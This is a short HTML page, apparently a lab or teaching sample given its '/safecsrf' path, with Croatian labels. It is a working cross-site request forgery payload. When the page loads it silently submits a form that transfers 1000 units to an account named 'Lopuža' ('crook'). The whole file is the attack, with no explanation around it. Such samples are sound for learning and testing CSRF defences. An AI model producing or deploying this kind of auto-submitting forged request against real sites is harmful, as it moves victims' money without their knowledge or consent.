<body onload="document.forms[0].submit()">
    <form action="/safecsrf/transferfunds" method="post">
        <label for="amount">Iznos:</label>
        <input type="number" class="form-control" id="amount" name="amount" required value="1000">
        <label for="account">Odredišni račun:</label>
        <input type="text" class="form-control" id="acc" name="acc" required value="Lopuža">
    </form>
</body>

